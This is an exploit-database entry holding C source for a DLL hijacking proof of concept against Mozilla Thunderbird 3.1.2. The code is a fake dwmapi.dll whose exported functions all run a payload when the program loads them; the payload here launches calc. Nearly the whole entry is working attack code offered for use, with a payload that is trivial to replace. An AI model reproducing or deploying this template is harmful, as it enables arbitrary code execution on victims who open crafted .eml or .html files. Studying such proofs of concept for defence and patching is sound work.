Mozilla Thunderbird DLL Hijacking Exploit (dwmapi.dll)

2010-08-25T00:00:00
ID 1337DAY-ID-13852
Type zdt
Reporter h4ck3r#47
Modified 2010-08-25T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            ======================================================
Mozilla Thunderbird DLL Hijacking Exploit (dwmapi.dll)
======================================================

/*
Exploit Title: Mozilla Thunderbird DLL Hijacking Exploit ( dwmapi.dll )
Date: 26/08/2010
Author: h4ck3r#47
http://twitter.com/hxteam
Version: Latest Mozilla Thunderbird 3.1.2
Tested on: Windows XP SP3
The code is based on the exploit from "TheLeader"
Vulnerable extensions: .eml .html
*/
 
#include <windows.h>
#define DLLIMPORT __declspec (dllexport)
 
DLLIMPORT void  DwmDefWindowProc() { evil(); }
DLLIMPORT void  DwmEnableBlurBehindWindow() { evil(); }
DLLIMPORT void  DwmEnableComposition() { evil(); }
DLLIMPORT void  DwmEnableMMCSS() { evil(); }
DLLIMPORT void  DwmExtendFrameIntoClientArea() { evil(); }
DLLIMPORT void  DwmGetColorizationColor() { evil(); }
DLLIMPORT void  DwmGetCompositionTimingInfo() { evil(); }
DLLIMPORT void  DwmGetWindowAttribute() { evil(); }
DLLIMPORT void  DwmIsCompositionEnabled() { evil(); }
DLLIMPORT void  DwmModifyPreviousDxFrameDuration() { evil(); }
DLLIMPORT void  DwmQueryThumbnailSourceSize() { evil(); }
DLLIMPORT void  DwmRegisterThumbnail() { evil(); }
DLLIMPORT void  DwmSetDxFrameDuration() { evil(); }
DLLIMPORT void  DwmSetPresentParameters() { evil(); }
DLLIMPORT void  DwmSetWindowAttribute() { evil(); }
DLLIMPORT void  DwmUnregisterThumbnail() { evil(); }
DLLIMPORT void  DwmUpdateThumbnailProperties() { evil(); }
 
int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}



#  0day.today [2018-01-26]  #